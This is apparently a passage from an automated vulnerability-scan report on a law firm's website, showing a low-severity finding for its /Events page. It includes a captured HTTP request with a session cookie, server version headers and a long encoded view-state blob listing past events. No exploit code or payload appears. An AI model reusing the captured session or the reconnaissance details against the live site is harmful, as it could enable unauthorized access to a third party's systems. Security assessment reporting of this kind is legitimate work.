dHVkZW50c2RkAgMPZBYCAgEPDxYEHwQFD0p1ZGljaWFsIENsZXJrcx8CBQ9KdWRpY2lhbC1DbGVya3NkZAIED2QWAgIBDw8WBB8EBQVTdGFmZh8CBRRTdGFmZi1hdC1Ib3dhcmQtUmljZWRkAgUPZBYCAgEPDxYEHwQFCUF0dG9ybmV5cx8CBQlBdHRvcm5leXNkZAIFDw8WBB4IQ3NzQ2xhc3MFB2hlYWRpbmceBF8hU0ICAmQWBAIBDw8WBB4ISW1hZ2VVcmwFIWltYWdlcy9MYW5kaW5nUGFnZS80MDk3X2ltYWdlLmpwZx8BZ2RkAgMPDxYCHwFoZGQCBw9kFghmDw8WAh8BZ2RkAgEPZBYEAgEPDxYIHwIFBkFsdW1uaR8EBQZBbHVtbmkfBQUSY3VycmVudCBzaWRlaGVhZGVyHwYCAmRkAgMPFgIfA2ZkAgMPZBYKAgMPEGRkFgFmZAIEDxBkZBYBZmQCBQ8QZGQWAWZkAgYPEGRkFgFmZAIHDxBkZBYBZmQCCQ8PFgIfAWdkFgQCAQ8WAh8DAgEWAgIBD2QWAmYPFQIBMAZBbHVtbmlkAgUPFgIfAwIBFgJmD2QWBmYPFQEBMGQCAQ8PFgIfBAVST3VyIGFsdW1uaSBzaXRlIGlzIHRlbXBvcmFyaWx5IHVuYXZhaWxhYmxlLiBQbGVhc2UgY2hlY2sgYmFjayBhdCBhIGxhdGVyIGRhdGUuPGJyPmRkAgMPFgIfA2ZkAgIPZBYMAgEPDxYCHwIFB1NpdGVtYXBkZAIDDw8WAh8CBQQ2ODYyZGQCBQ8PFgIfAgUGQWx1bW5pZGQCBw8PFgIfAgUNTGVnYWwtTm90aWNlc2RkAgkPDxYCHwIFBDY4NjZkZAILDw8WAh8CBQpDb250YWN0LVVzZGQCAw9kFgICAQ8PFgIfBAVUJiMxNjk7IDIwMTEgSG93YXJkIFJpY2UgTmVtZXJvdnNraSBDYW5hZHkgRmFsayAmYW1wOyBSYWJraW4gUEMuIEFsbCByaWdodHMgcmVzZXJ2ZWQuZGRk" />
...[SNIP]...
15.4. http://www.howardrice.com/Events  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /Events

Request

GET /Events HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.1.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 114611
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:12:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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aWF0ZSBNdXR1YWxseSBCZW5lZmljaWFsIENvbGxhYm9yYXRpdmUgUmVzZWFyY2ggQWdyZWVtZW50cyB3aXRoIEFjYWRlbWljIEluc3RpdHV0aW9ucyJkAgcPDxYCHwQFC1Bhc3QgRXZlbnRzFgIeB29uY2xpY2sFHCQoJyN0YWJzJykudGFicygnc2VsZWN0JywgMSlkAgEPZBYKZg8VAQExZAIBDw8WAh8EZWRkAgMPDxYCHwQFC1Bhc3QgRXZlbnRzZGQCBQ8WAh8DAkQWiAECAQ9kFgQCAQ8WAh8BZxYCZg9kFgICAQ8PFgIfBAUITWF5IDIwMTFkZAICDxUDBk1heSAxMAQ3MjE3blRlcnJ5IEpvaG5zb24gYW5kIEJyeWNlIEdpZGRlbnMsIFNwZWFrZXJzLCAiVHJhcHMgZm9yIFVud2FyeSBDb2xsZWN0b3JzIFdoZW4gQ29udHJhY3Rpbmcgd2l0aCBQdWJsaWMgRW50aXRpZXMiZAICD2QWAgICDxUDBk1heSAxMAQ3MjkxXlNlYW4gU2VMZWd1ZSwgUGFuZWxpc3QsICJUaGUgUXVhbGNvbW0gTmlnaHRtYXJlOiBMYXd5ZXJzJyBSZXNwb25zaWJpbGl0aWVzIGluIHRoZSBEaWdpdGFsIEFnZSJkAgMPZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFCkFwcmlsIDIwMTFkZAICDxUDCEFwcmlsIDExBDcyMjg9Q2Fyb2xlIEJhcnJldHQsIFNwZWFrZXIsICJJJ2xsIFRha2UgUG90cG91cnJpIGZvciAkMTAwLCBBbGV4ImQCBA9kFgICAg8VAwhBcHJpbCAwOAQ3MjIyQEpvbmF0aGFuIEh1Z2hlcywgU3BlYWtlciwgIkV0aGljczogSXNzdWVzIGZvciBFU0EgUHJvZmVzc2lvbmFscyJkAgUPZBYCAgIPFQMIQXByaWwgMDYENzIxNY0BRWQgRGVpYmVydCwgUGFuZWxpc3QsICJUcmVuZHMgaW4gdGhlIEFjcXVpc2l0aW9uIG9mIFB1YmxpYyBDb21wYW5pZXM6IEluc2lnaHRzIGZyb20gdGhlIDIwMTAgU3RyYXRlZ2ljIEJ1eWVyL1B1YmxpYyBUYXJnZXQgRGVhbCBQb2ludHMgU3R1ZHkiZAIGD2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQpNYXJjaCAyMDExZGQCAg8VAwhNYXJjaCAzMQQ3MTAzXENhcm9sZSBCYXJyZXR0LCBTcGVha2VyLCAiTGl0aWdhdGlvbiBVcGRhdGVzOiBMZWFkaW5nIGNvcHlyaWdodCBhbmQgdHJhZGVtYXJrLXJlbGF0ZWQgY2FzZXMiZAIHD2QWAgICDxUDCE1hcmNoIDIzBDcwNTlNUm9uIFN0YXIgYW5kIEVsbGVuIEZsZWlzaGhhY2tlciwgUGFuZWxpc3RzLCAiTmV4dCBHZW5lcmF0aW9uIExlYWRlcnMgUHJvZ3JhbSJkAggPZBYCAgIPFQMITWFyY2ggMjIENzIxNjBUaG9tYXMgTWFnbmFuaSwgU3BlYWtlciwgIkludGVsbGVjdHVhbCBQcm9wZXJ0eSJkAgkPZBYGAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFDEphbnVhcnkgMjAxMWRkAgIPFQMKSmFudWFyeSAyOAQ3MTcyTUJlbiBCZXJrLCBQYW5lbGlzdCwgIkJ1c2luZXNzIExhdyBQcmFjdGljZSAtIDMxc3QgQW5udWFsIFJlY2VudCBEZXZlbG9wbWVudHMiZAIDDxYCHwFnZAIKD2QWAgICDxUDCkphbnVhcnkgMjEENzE3MU1CZW4gQmVyaywgUGFuZWxpc3QsICJCdXNpbmVzcyBMYXcgUHJhY3RpY2UgLSAzMXN0IEFubnVhbCBSZWNlbnQgRGV2ZWxvcG1lbnRzImQCCw9kFgICAg8VAwpKYW51YXJ5IDE5BDcxNDhnQW15IEJvbXNlLCAiU3BlYWtlciwgU3RhcnRpbmcgUmlnaHQ6IENvbmZsaWN0cyBNYW5hZ2VtZW50LCBFbmdhZ2VtZW50IExldHRlcnMgYW5kIE90aGVyIEV0aGljcyBNYXR0ZXJzImQCDA9kFgQCAQ8WAh8BZxYCZg9kFgICAQ8PFgIfBAUNTm92ZW1iZXIgMjAxMGRkAgIPFQMLTm92ZW1iZXIgMTUEMjc0OGdDYXJvbGUgQmFycmV0dCwgU3BlYWtlciwgIlJvdW5kdGFibGUgb24gV0lQTyBUcmFkZW1hcmsgUmVnaXN0cmF0aW9uIFN0cmF0ZWdpZXMgYW5kIFVwZGF0ZXMgZnJvbSBHZW5ldmEiZAIND2QWAgICDxUDC05vdmVtYmVyIDEyBDI3NDVVSm9uYXRoYW4gSHVnaGVzLCBTcGVha2VyLCAiRXRoaWNhbCBEaWxlbW1hcyBpbiBQcmVwYXJhdGlvbiBhbmQgUmV2aWV3IG9mIFNFQyBGaWxpbmdzImQCDg9kFgICAg8VAwtOb3ZlbWJlciAxMAQyNzQ5nAFTaW1vbmEgQWdub2x1Y2NpLCBTcGVha2VyLCAiQSBDZWxlYnJhdGlvbiBvZiBSZWNlbnQgVmljdG9yaWVzIGZvciBSZWZ1Z2VlIFdvbWVuIGFuZCBhbiBVcGRhdGUgb24gUG9zdC1FYXJ0aHF1YWtlIENvbmRpdGlvbnMgZm9yIFdvbWVuIGFuZCBDaGlsZHJlbiBpbiBIYWl0aSJkAg8PZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFDE9jdG9iZXIgMjAxMGRkAgIPFQMKT2N0b2JlciAyOAQyNzQ0ZERlbm55IFJpY2UsIFNwZWFrZXIsICJQcml2YWN5IGFuZCBTb2NpYWwgTmV0d29ya2luZzogVGhlIExhdGVzdCBEZXZlbG9wbWVudHMgZnJvbSBFdXJvcGUgYW5kIHRoZSBVUyJkAhAPZBYCAgIPFQMKT2N0b2JlciAyOAQyNzQ3OENhcm9sZSBCYXJyZXR0LCBTcGVha2VyLCAiTnV0cyAmIEJvbHRzIG9mIFRUQUIgUHJhY3RpY2UiZAIRD2QWAgICDxUDCk9jdG9iZXIgMjEEMjc0MHpHaWxiZXJ0IFNlcm90YSwgU3BlYWtlciwgIlRoZSBXb3JsZCBvZiBFbXBsb3llZSBQcml2YWN5OiBQcm90ZWN0aW5nIGFuZCBFbmZvcmNpbmcgVHJhZGUgU2VjcmV0cyBhbmQgUmVzdHJpY3RpdmUgQ292ZW5hbnRzImQCEg9kFgICAg8VAwpPY3RvYmVyIDEzBDI3NDZvQ2xhcmEgU2hpbiwgUGFuZWxpc3QsICJUaGUgRGlnaXRhbCBGaXJzdCBTYWxlIERvY3RyaW5lOiBXaG8gT3ducyAtIG9yIExpY2Vuc2VzIC0gRGlnaXRhbCBQcm9kdWN0cyBhbmQgQ29udGVudD8iZAITD2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQ5TZXB0ZW1iZXIgMjAxMGRkAgIPFQMMU2VwdGVtYmVyIDI4BDI3NDI9QmVuIEJlcmssIFNwZWFrZXIsICJUYXggQ29uc2lkZXJhdGlvbnMgaW4gQ2hvb3NpbmcgYW4gRW50aXR5ImQCFA9kFgICAg8VAwxTZXB0ZW1iZXIgMTQEMjc0M1ZTZWFuIFNlTGVndWUgYW5kIFNpbW9uYSBBZ25vbHVjY2ksIFNwZWFrZXJzLCAiQXBwZWxsYXRlIFByYWN0aWNlIGluIHRoZSBOaW50aCBDaXJjdWl0ImQCFQ9kFgQCAQ8WAh8BZxYCZg9kFgICAQ8PFgIfBAULQXVndXN0IDIwMTBkZAICDxUDCUF1Z3VzdCAwNwQyNzM3SERlbmlzIFQuIFJpY2UsIENvLUNoYWlyLCAiRGlyZWN0b3JzIGFuZCBPZmZpY2VycyBvZiBVLlMuIE11bHRpbmF0aW9uYWxzImQCFg9kFgICAg8VAwlBdWd1c3QgMDYEMjczOXRFZHdhcmQgRGVpYmVydCwgU3BlYWtlciwgIkRlY2lwaGVyaW5nIER1ZSBEaWxpZ2VuY2U6IFRhY2tsaW5nIHRoZSBJVCBJc3N1ZXMgVGhhdCBDYW4gQ3JpcHBsZSBhIEJ1c2luZXNzIFRyYW5zYWN0aW9uImQCFw9kFgQCAQ8WAh8BZxYCZg9kFgICAQ8PFgIfBAUJSnVuZSAyMDEwZGQCAg8VAwdKdW5lIDI5BDI3Mza1AVNlYW4gU2VMZWd1ZSwgU3BlYWtlciwgIkF2b2lkaW5nIEluc3VyYW5jZSBHYXBzOiBXaGF0IEV2ZXJ5IEludGVsbGVjdHVhbCBQcm9wZXJ0eSBMYXd5ZXIgU2hvdWxkIEtub3cgQWJvdXQgTGVnYWwgTWFscHJhY3RpY2UgQ292ZXJhZ2UsIEV4Y2x1c2lvbnMsIFNhbmN0aW9ucywgYW5kIEV0aGljYWwgVmlvbGF0aW9ucyJkAhgPZBYCAgIPFQMHSnVuZSAwOQQyNzM0RUpvbmF0aGFuIEh1Z2hlcywgU3BlYWtlciwgIkV0aGljYWwgRGlsZW1tYXMgQXJpc2luZyB3aXRoIERlcG9zaXRpb25zImQCGQ9kFgQCAQ8WAh8BZxYCZg9kFgICAQ8PFgIfBAUITWF5IDIwMTBkZAICDxUDBk1heSAyNAQyNzE4WERlbmlzIFQuIFJpY2UsIFNwZWFrZXIsICJTZWN1cml0eSBCcmVhY2hlczogTm90aWZpY2F0aW9uIENoYWxsZW5nZXMgYW5kIExpYWJpbGl0eSBSaXNrcyJkAhoPZBYCAgIPFQMGTWF5IDIyBDI3MzFjUGFtZWxhIFBoaWxsaXBzLCBTcGVha2VyLCAiVGhlIEV0aGljcyBvZiBEaXNzb2x2aW5nIGEgTGF3IEZpcm06IEF2b2lkaW5nIEEgRGlzYXN0cm91cyBGcmVlLUZvci1BbGwiZAIbD2QWAgICDxUDBk1heSAyMQQyNzIySEpvbmF0aGFuIEh1Z2hlcywgU3BlYWtlciwgIkV0aGljczogSXNzdWVzIEZhY2luZyB0aGUgV2F0ZXIgUHJvZmVzc2lvbmFsImQCHA9kFgICAg8VAwZNYXkgMTUEMjczM4ABUm9uYWxkIFN0YXIsIFNwZWFrZXIsICJCdXNpbmVzcyBCb290Y2FtcCAtIFNlY3JldHMgb2YgQ29tcGFueSBWYWx1YXRpb24sIExlZ2FsIEZvcm1hdGlvbiAmIENhcGl0YWxpemF0aW9uIFN0cnVjdHVyZSBvZiBTdGFydHVwcyJkAh0PZBYCAgIPFQMGTWF5IDA3BDI3MjFXQmVuIEJlcmssIFNwZWFrZXIsICJIb3cgdG8gT3B0aW1pemUgVmFsdWUgaW4gU2Vjb25kYXJ5IE1hcmtldHMgZm9yIEFuZ2VsLUhlbGQgRXF1aXRpZXMiZAIeD2QWAgICDxUDBk1heSAwNAQyNzI3UkJlbiBCZXJrIGFuZCBFbGxlbiBGbGVpc2hoYWNrZXIsIFNwZWFrZXJzLCAiUHJpdmF0ZSBFcXVpdHkgU2Vjb25kYXJ5IFRyYW5zYWN0aW9ucyJkAh8PZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFCkFwcmlsIDIwMTBkZAICDxUDCEFwcmlsIDIyBDI3MjBkRWR3YXJkIERlaWJlcnQsIFNwZWFrZXIsICJHb3RjaGE6IEEgU3VydmV5IG9mIEhpZGRlbiBUcmFwcyBmb3IgdGhlIFVud2FyeSBpbiBTZXZlcmFsIFByYWN0aWNlIEFyZWFzImQCIA9kFgICAg8VAwhBcHJpbCAyMQQyNzMyPlJvbmFsZCBTdGFyLCBTcGVha2VyLCAiTGV0aGFsIE1pc3Rha2VzIFN0YXJ0dXBzIE5lZWQgdG8gQXZvaWQiZAIhD2QWAgICDxUDCEFwcmlsIDE0BDI3MjlrU3RldmVuIE1heWVyLCBTcGVha2VyLCAiQ2l0aXplbnMgVW5pdGVkIHYuIEZFQzogSXRzIEltcGFjdCBvbiBFbGVjdGlvbnMsIERlbW9jcmFjeSBhbmQgdGhlIEZpcnN0IEFtZW5kbWVudCJkAiIPZBYCAgIPFQMIQXByaWwgMTQEMjczMF1UaG9tYXMgTWFnbmFuaSwgU3BlYWtlciwgIkRhbWFnZXMgTGF3IGFuZCBQb2xpY3kgKFBhcnQgSUlJKTogQnVzaW5lc3MgUm9sZSBvZiBQYXRlbnQgRGFtYWdlcyJkAiMPZBYCAgIPFQMIQXByaWwgMDkEMjcxNp0BU2VhbiBTZUxlZ3VlLCBTcGVha2VyLCAiV2hhdCBFdmVyeSBJbnRlbGxlY3R1YWwgUHJvcGVydHkgTGF3eWVyIFNob3VsZCBLbm93IEFib3V0IExlZ2FsIE1hbHByYWN0aWNlIEluc3VyYW5jZSwgTGl0aWdhdGlvbiwgU2FuY3Rpb25zLCBhbmQgRXRoaWNhbCBWaW9sYXRpb25zImQCJA9kFgQCAQ8WAh8BZxYCZg9kFgICAQ8PFgIfBAUKTWFyY2ggMjAxMGRkAgIPFQMITWFyY2ggMjQEMjcyOE9UaG9tYXMgTWFnbmFuaSwgU3BlYWtlciwgIlRoZSBCcmFuZCBMaWNlbnNpbmcgUmFjZTogU3RlZXJpbmcgQnJhbmRzIHRvIFN1Y2Nlc3MiZAIlD2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQxKYW51YXJ5IDIwMTBkZAICDxUDCkphbnVhcnkgMjEEMjcxMVVTZWFuIFNlTGVndWUsIFNwZWFrZXIsICJCZXR0ZXIgV2F5cyB0byBTcGVuZCBZb3VyIFRpbWU6IEF2b2lkaW5nIENsaWVudCBGZWUgRGlzcHV0ZXMiZAImD2QWAgICDxUDCkphbnVhcnkgMTQEMjcxM19TZWFuIFNlTGVndWUsIFNwZWFrZXIsICJQb3dlcmZ1bCBBcHBlbGxhdGUgJiBSZXNwb25kZW50IEJyaWVmczogU3RyYXRlZ2llcyAmIFRhY3RpY3MgVGhhdCBXb3JrImQCJw9kFgICAg8VAwpKYW51YXJ5IDEzBDI3MTJFSnVsaWEgVmF4LCBTcGVha2VyLCAiRXRoaWNhbCBJc3N1ZXMgaW4gRHJhZnRpbmcgQ29ycG9yYXRlIEFncmVlbWVudHMiZAIoD2QWAgICDxUDCkphbnVhcnkgMDgEMjcxMDhTZWFuIFNlTGVndWUsIE1vZGVyYXRvciwgIlRvcCBKdXJ5IENvbnN1bHRhbnRzIFRlbGwgQWxsImQCKQ9kFgICAg8VAwpKYW51YXJ5IDA3BDI3MTRiRGVib3JhaCBEYXZpcyBIYW4sIFByZXNlbnRlciwgIldoYXQncyBNaW5lIGlzIE1pbmUgJiBXaGF0J3MgWW91cnMgaXMgTWluZTogVHJhZGVtYXJrcyBhcyBQcm9wZXJ0eSJkAioPZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFDU5vdmVtYmVyIDIwMDlkZAICDxUDC05vdmVtYmVyIDE4BDI3MDlOVGhvbWFzIE1hZ25hbmksIFBhbmVsaXN0LCAiQUNDJ3MgVmFsdWUgQ2hhbGxlbmdlOiBIb3cgaXMgWW91ciBMYXcgRmlybSBEb2luZz8iZAIrD2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQxPY3RvYmVyIDIwMDlkZAICDxUDCk9jdG9iZXIgMjkEMjcxOWFFZHdhcmQgRGVpYmVydCwgU3BlYWtlciwgIkluc2lnaHRzIGZyb20gdGhlIDIwMDkgU3RyYXRlZ2ljIEJ1eWVyL1B1YmxpYyBUYXJnZXQgRGVhbCBQb2ludHMgU3R1ZHkiZAIsD2QWAgICDxUDCk9jdG9iZXIgMDEEMjcwNjJTZWFuIFNlTGVndWUsIFNwZWFrZXIsICJBcnQgaW4gYSBTdGltdWx1cyBFY29ub215ImQCLQ9kFgQCAQ8WAh8BZxYCZg9kFgICAQ8PFgIfBAUOU2VwdGVtYmVyIDIwMDlkZAICDxUDDFNlcHRlbWJlciAwOQQyNzA1OFNlYW4gU2VMZWd1ZSwgU3BlYWtlciwgIkV0aGljYWwgSXNzdWVzIGluIGEgQmFkIEVjb25vbXkiZAIuD2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQlKdW5lIDIwMDlkZAICDxUDB0p1bmUgMTgEMjcwNEZQYW1lbGEgUGhpbGxpcHMsIFBhbmVsaXN0LCAiRXRoaWNhbCBEaWxlbW1hcyBBcmlzaW5nIFdpdGggRGVwb3NpdGlvbnMiZAIvD2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQhNYXkgMjAwOWRkAgIPFQMGTWF5IDI2BDI3MDJYTWFydGluIEdsaWNrLCBQYW5lbGlzdCwgIkEgUGFuZWwgRGlzY3Vzc2lvbiBvbiBXb21lbiBvZiBDb2xvciBpbiBQcml2YXRlIExlZ2FsIFByYWN0aWNlImQCMA9kFgICAg8VAwZNYXkgMDIEMjcwOEBCZW4gQmVyaywgTW9kZXJhdG9yLCAiTExDczogQWR2YW5jZWQgUGxhbm5pbmcgQW5kIExhdGVzdCBUcmVuZHMiZAIxD2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQpBcHJpbCAyMDA5ZGQCAg8VAwhBcHJpbCAyNAQyNzAwQkJlbiBCZXJrLCBQYW5lbGlzdCwgIkxlZ2FsIENvbnNpZGVyYXRpb25zIGluIHRoZSBTZWNvbmRhcnkgTWFya2V0ImQCMg9kFgICAg8VAwhBcHJpbCAyMwQyNjk5f1Rob21hcyBNYWduYW5pLCBTcGVha2VyLCAiR29vZ2xlIFByaW50IExpYnJhcnkgQ2xhc3MgQWN0aW9uIFNldHRsZW1lbnQgYW5kIEltcGxpY2F0aW9ucyBmb3IgdGhlIEZ1dHVyZSBvZiBDb3B5cmlnaHQgUHJvdGVjdGlvbiJkAjMPZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFDUZlYnJ1YXJ5IDIwMDlkZAICDxUDC0ZlYnJ1YXJ5IDI2BDI2OTRCVGhvbWFzIE1hZ25hbmksIFNwZWFrZXIsICJBbmFseXNpcyBvZiBhIENvbnRlbnQgTGljZW5zZSBBZ3JlZW1lbnQiZAI0D2QWAgICDxUDC0ZlYnJ1YXJ5IDE3BDI2OTNPU2VhbiBTZUxlZ3VlLCBTcGVha2VyLCBEZXN0aW5lZCBmb3IgQXBwZWFsOiBBcHBlbGxhdGUgVGlwcyBmb3IgdGhlIFRyaWFsIExhd3llcmQCNQ9kFgQCAQ8WAh8BZxYCZg9kFgICAQ8PFgIfBAUMSmFudWFyeSAyMDA5ZGQCAg8VAwpKYW51YXJ5IDMwBDI2OTFRU2VhbiBTZUxlZ3VlLCBTcGVha2VyLCBFdGhpY3MgSXNzdWVzIGZvciBFbnZpcm9ubWVudGFsIEF0dG9ybmV5czogQWR2YW5jZWQgQ291cnNlZAI2D2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQ1Ob3ZlbWJlciAyMDA4ZGQCAg8VAwtOb3ZlbWJlciAwMwQyNjg4L1BhbWVsYSBQaGlsbGlwcywgU3BlYWtlciwgSXNzdWVzIGluIEV0aGljcyBSdWxlZAI3D2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQtBdWd1c3QgM